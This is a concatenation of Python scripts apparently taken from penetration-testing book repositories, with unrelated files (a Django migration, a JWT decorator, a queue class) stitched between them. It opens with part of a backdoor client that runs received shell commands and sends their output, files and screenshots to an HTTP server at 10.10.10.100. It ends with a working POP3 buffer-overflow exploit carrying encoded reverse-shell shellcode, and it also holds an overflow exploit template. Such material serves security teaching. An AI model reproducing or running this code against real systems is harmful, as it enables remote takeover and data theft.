files = {'file': open(path, 'rb')}
r = requests.post(url, files=files)
else:
post_response = requests.post(url='http://10.10.10.100', data='[-] Not able to find the file !' )
elif 'screencap' in command: #If we got a screencap keyword, then ..
dirpath = tempfile.mkdtemp() #Create a temp dir to store our screenshot file
ImageGrab.grab().save(dirpath + "\img.jpg", "JPEG") #Save the screencap in the temp dir
url = 'http://10.10.10.100/store'
files = {'file': open(dirpath + "\img.jpg", 'rb')}
r = requests.post(url, files=files) #Transfer the file over our HTTP
files['file'].close() #Once the file gets transfered, close the file.
shutil.rmtree(dirpath) #Remove the entire temp dir
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
post_response = requests.post(url='http://10.10.10.100', data=CMD.stdout.read() )
post_response = requests.post(url='http://10.10.10.100', data=CMD.stderr.read() )
time.sleep(3)
| 26.25 | 123 | 0.597192 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-07 23:16
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nmaper', '0004_nmapscan_status_text'),
]
operations = [
migrations.AddField(
model_name='nmapprofile',
name='profilename_text',
field=models.CharField(default='Default', max_length=32),
preserve_default=False,
),
]
| 22.636364 | 69 | 0.60501 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: wrapper_exploit.py
Purpose: An sample exploit for wrapping around a binary execution
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys, socket, struct, subprocess

# Raw string keeps \v in the path from being read as a vertical-tab escape
program_name = r'C:\exploit_writing\vulnerable.exe'
# The hash marks below are intentional placeholders, filled in per target
fill = "A"*####                     # padding needed to reach the saved EIP
eip = struct.pack('<I',0x########)  # little-endian return-address overwrite
offset = "\x90"*##                  # NOPs to fill the remaining space
available_shellcode_space = ###
shell = ()                          # shellcode to insert
exploit = fill + eip + offset + shell
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(exploit, (rhost, rport))   # rhost/rport: placeholders for the target host and port
subprocess.call([program_name, exploit])
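
# Hedged illustration of the struct.pack('<I', ...) line above: '<I' packs an
# unsigned 32-bit integer in little-endian byte order, which is how an x86
# return-address overwrite is laid into the buffer. The address here is an
# example value, not one taken from this template:
#
#   >>> import struct
#   >>> struct.pack('<I', 0x625011af)
#   '\xaf\x11\x50\x62'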
| 48.902439 | 89 | 0.780929 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: June 2015
Name: multi_threaded.py
Purpose: To identify live web applications with a list of IP addresses, using concurrent threads
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2, argparse, sys, threading, logging, Queue, time
queue = Queue.Queue()
lock = threading.Lock()
class Agent(threading.Thread):
def __init__(self, queue, logger, verbose):
threading.Thread.__init__(self)
self.queue = queue
self.logger = logger
self.verbose = verbose
def run(self):
while True:
host = self.queue.get()
print("[*] Testing %s") % (str(host))
target = "http://" + host
target_secure = "https://" + host
try:
request = urllib2.Request(target)
request.get_method = lambda : 'HEAD'
response = urllib2.urlopen(request)
except:
with lock:
self.logger.debug("[-] No web server at %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
print("[-] No web server at %s reported by thread %s") % (str(target), str(threading.current_thread().name))
response = None
if response != None:
with lock:
self.logger.debug("[+] Response from %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
print("[*] Response from insecure service on %s reported by thread %s") % (str(target), str(threading.current_thread().name))
self.logger.debug(response.info())
try:
                request_secure = urllib2.Request(target_secure)
request_secure.get_method = lambda : 'HEAD'
response_secure = urllib2.urlopen(request_secure)
except:
with lock:
self.logger.debug("[-] No secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
print("[-] No secure web server at %s reported by thread %s") % (str(target_secure), str(threading.current_thread().name))
response_secure = None
if response_secure != None:
with lock:
self.logger.debug("[+] Secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
print("[*] Response from secure service on %s reported by thread %s") % (str(target_secure), str(threading.current_thread().name))
self.logger.debug(response_secure.info())
# Execution is complete
self.queue.task_done()
def main():
# If script is executed at the CLI
    usage = '''usage: %(prog)s [-t hostfile] [-f filename] [-l logfile.log] [-m threads] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-t", action="store", dest="targets", default=None, help="Filename for hosts to test")
parser.add_argument("-f", "--filename", type=str, action="store", dest="filename", default="xml_output", help="The filename that will be used to create an XLSX")
parser.add_argument("-m", "--multi", action="store", dest="threads", default=1, type=int, help="Number of threads, defaults to 1")
parser.add_argument("-l", "--logfile", action="store", dest="log", default="results.log", type=str, help="The log file to output the results")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if (args.targets == None):
parser.print_help()
sys.exit(1)
# Set Constructors
targets = args.targets # Targets to be parsed
verbose = args.verbose # Verbosity level
threads = args.threads # Threads to be used
log = args.log # Configure the log output file
if ".log" not in log:
log = log + ".log"
level = logging.DEBUG # Logging level
format = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s") # Log format
logger_obj = logging.getLogger() # Getter for logging agent
    file_handler = logging.FileHandler(log) # File Handler, uses the validated log filename
#stderr_handler = logging.StreamHandler() # STDERR Handler
targets_list = []
# Configure logger formats for STDERR and output file
file_handler.setFormatter(format)
#stderr_handler.setFormatter(format)
# Configure logger object
logger_obj.addHandler(file_handler)
#logger_obj.addHandler(stderr_handler)
logger_obj.setLevel(level)
# Load the targets into a list and remove trailing "\n"
with open(targets) as f:
targets_list = [line.rstrip() for line in f.readlines()]
# Spawn workers to access site
for thread in range(0, threads):
worker = Agent(queue, logger_obj, verbose)
worker.setDaemon(True)
worker.start()
# Build queue of work
for target in targets_list:
queue.put(target)
# Wait for the queue to finish processing
queue.join()
if __name__ == '__main__':
main()
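
# Hedged usage example (hosts.txt is an assumed input file with one IP or
# hostname per line; the flags map to the argparse options defined above):
#
#   python multi_threaded.py -t hosts.txt -m 5 -l results.log -v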
| 51.992958 | 165 | 0.604466 |
owtf | """
JSON Web Token auth for Tornado
"""
from sqlalchemy.sql.functions import user
from owtf.models.user_login_token import UserLoginToken
import jwt
from owtf.settings import JWT_SECRET_KEY, JWT_OPTIONS
from owtf.db.session import Session
def jwtauth(handler_class):
"""Decorator to handle Tornado JWT Authentication"""
def wrap_execute(handler_execute):
def require_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth:
parts = auth.split()
if parts[0].lower() != "bearer" or len(parts) == 1 or len(parts) > 2:
handler._transforms = []
handler.set_status(401)
handler.write({"success": False, "message": "Invalid header authorization"})
                    handler.finish()
                    return False
token = parts[1]
try:
payload = jwt.decode(token, JWT_SECRET_KEY, options=JWT_OPTIONS)
user_id = payload.get("user_id", None)
session = Session()
user_token = UserLoginToken.find_by_userid_and_token(session, user_id, token)
if user_id is None or user_token is None:
handler._transforms = []
handler.set_status(401)
handler.write({"success": False, "message": "Unauthorized"})
                        handler.finish()
                        return False
except Exception:
handler._transforms = []
handler.set_status(401)
handler.write({"success": False, "message": "Unauthorized"})
                handler.finish()
                return False
else:
            handler._transforms = []
            handler.set_status(401)
            handler.write({"success": False, "message": "Missing authorization"})
            handler.finish()
            return False
return True
def _execute(self, transforms, *args, **kwargs):
            try:
                authorized = require_auth(self, kwargs)
            except Exception:
                return False
            if not authorized:
                # require_auth already wrote a 401 response and finished it
                return False
            return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
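
# Hedged usage sketch -- ApiHandler and its route are illustrative, not part
# of owtf. A handler decorated with @jwtauth rejects any request that lacks a
# valid "Authorization: Bearer <token>" header before its own methods run.
import tornado.web

@jwtauth
class ApiHandler(tornado.web.RequestHandler):
    def get(self):
        # Only reached when jwt.decode() succeeded and the token maps to a
        # known user id in UserLoginToken.
        self.write({"success": True})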
| 34.625 | 97 | 0.534006 |
Python-Penetration-Testing-for-Developers | import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.0.1"
port =12345
s.connect((host,port))
print s.recv(1024)
s.send("Hello Server")
s.close() | 18.666667 | 53 | 0.715909 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
from pprint import pprint
network = IP(dst = '192.168.1.1')
transport = ICMP()
packet = network/transport
send(packet)
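
# Hedged extension (not in the original recipe): send() is fire-and-forget;
# sr1() from scapy.all sends the same ICMP echo request and returns the first
# reply, confirming the host answered. The 2-second timeout is an assumed value.
reply = sr1(packet, timeout=2)
if reply is not None:
    reply.show()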
| 17.125 | 33 | 0.729167 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.6
from abc import ABC, abstractmethod
class QueueAbs(ABC):
def __init__(self):
self.buffer=[]
def printItems(self):
for item in self.buffer:
print(item)
@abstractmethod
def enqueue(self,item):
pass
@abstractmethod
def dequeue(self):
pass
class Queue(QueueAbs):
def __init__(self,length):
super().__init__()
self.length=length
    def enqueue(self, item):
        # Reject the item when the buffer already holds `length` entries
        is_full = self.length <= len(self.buffer)
        if is_full:
            print("Queue is full")
            return
        self.buffer.append(item)

    def dequeue(self):
        # FIFO removal: pop the oldest item from the front of the buffer
        if len(self.buffer) == 0:
            print("Empty Queue")
            return
        item = self.buffer[0]
        del self.buffer[0]
        return item
class Driver():
def main(self):
q=Queue(10)
print("Enqueing")
for item in range(0,10):
q.enqueue(item)
print("Printing")
q.printItems()
print("Dequeing")
for item in range(0,10):
item=q.dequeue()
print(item)
d=Driver()
d.main()
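
# Hedged illustration (not part of the original script): the ABC machinery
# prevents instantiating QueueAbs itself, since enqueue/dequeue are abstract.
try:
    QueueAbs()
except TypeError as err:
    print("QueueAbs is abstract:", err)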
| 13.640625 | 41 | 0.641026 |
Hands-On-Penetration-Testing-with-Python | import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buf = ""
buf += "\x99\x98\xf5\x41\x48\x9f\x2f\xfc\x9f\xf8\x48\x31\xc9"
buf += "\x48\x81\xe9\xd7\xff\xff\xff\x48\x8d\x05\xef\xff\xff"
buf += "\xff\x48\xbb\xb2\xa2\x05\x72\xca\x9c\x6b\xde\x48\x31"
buf += "\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x4e\x4a\x87"
buf += "\x72\xca\x9c\x0b\x57\x57\x93\xc5\x16\x41\xcc\x5b\x55"
buf += "\xe0\xae\x8e\x20\xde\x17\x19\xf6\xbd\x15\x4f\x54\xfb"
buf += "\x63\xc7\xe2\xd3\xde\x07\x5e\xea\x5d\xa4\xd3\xb3\x65"
buf += "\xe7\x80\x98\xcb\xe0\x8c\xa2\x29\x4f\x4e\x41\xd0\x7a"
buf += "\xa6\x51\xea\x04\xa3\x9b\x17\x32\xfe\xb3\x71\x8e\x3b"
buf += "\xd2\x7f\x51\x97\x39\x96\x8e\x73\x1c\xad\x94\x72\x73"
buf += "\x6d\x08\x73\x0d\xa4\x8b\xab\x44\xa1\x78\x8a\xf1\xe1"
buf += "\x4f\xab\x56\xfa\x8e\x2a\xee\x9d\xb8\xb8\x39\xae\x4e"
buf += "\xf9\x92\x80\x6a\x0d\x39\xa6\x8e\x73\x1a\x15\x2f\xfa"
buf += "\x96\xf9\x5e\x13\x93\xc6\x3a\x21\x52\xfd\x5a\x28\x41"
buf += "\x8e\x80\x53\xef\xca\x36\x40\xca\x9c\x03\xa9\xc1\x90"
buf += "\x5a\x26\xa2\xd0\x1c\xf8\xb5\x5d\xd0\xca\x5a\x9d\x6b"
buf += "\xde\x9b\x66\x51\x22\xa2\xb5\xeb\xb5\xb2\x5d\xd0\x22"
buf += "\x9a\xcc\x3b\x9e\xe2\xe2\x55\x1a\x20\x93\xb4\x3e\x4d"
buf += "\x77\x92\x18\xcf\xf4\xab\x76\x48\x3f\x6d\x70\xca\x99"
buf += "\xc8\x57\x54\xc8\x15\x24\x9d\xf4\xf2\x7b\xc6\xc3\xfa"
buf += "\xa7\x4f\x5c\x1f\xd2\x4d\xec\x0d\x07\x26\xf4\x9b\x6b"
buf += "\x10\xf4\xfa\xa7\xa2\xff\x06\xba\xb2\x2b\xe6\x25\x9d"
buf += "\xcb\x5a\x28\xd8\xb0\x5c\x24\x28\x61\x0d\x19\xf6\x86"
buf += "\x39\x73\xcb\x11\x2f\xfa\xa2\x64\x05\x36\x9e\xcc\x3d"
buf += "\x88\xe4\xe4\x53\x3c\x9c\xca\x38\x88\xda\xdb\xc9\x4d"
buf += "\x4c\x63\xbe\x57\x52\xec\x53\x34\x35\xac\x03\xd6\x35"
buf += "\xbf\x65\x8d\x1f\x27\x9b\x6b\x10\xf4\x6d\xd4\x5f\x21"
buf += "\xf6\x21\x67\x9e\x03\x0e\xc0\x1c\x90\x3e\xc7\xa7\xbe"
buf += "\x35\xd9\xee\x04\xb4\xb2\xf1\xfa\xa7\xca\x9c\x6b\xde"
buffer = '\x41' * 2606   # padding: bytes needed to reach the saved return address
try:
    print "\nSending payload"
    s.connect(('192.168.250.158',110))   # target POP3 service
    data = s.recv(1024)
    s.send('USER root' +'\r\n')
    data = s.recv(1024)
    print(str(data))
    # Overflowing PASS argument: padding + saved-EIP overwrite (little-endian
    # 0x5f4a358f) + the encoded reverse-shell payload built in buf above
    s.send('PASS ' + buffer + '\x8f\x35\x4a\x5f'+ buf + '\r\n')
data = s.recv(1024)
print(str(data))
s.close()
print "\nDone! see rev shell on 1433"
except:
print "Could not connect to POP3!"
| 44.215686 | 63 | 0.659436 |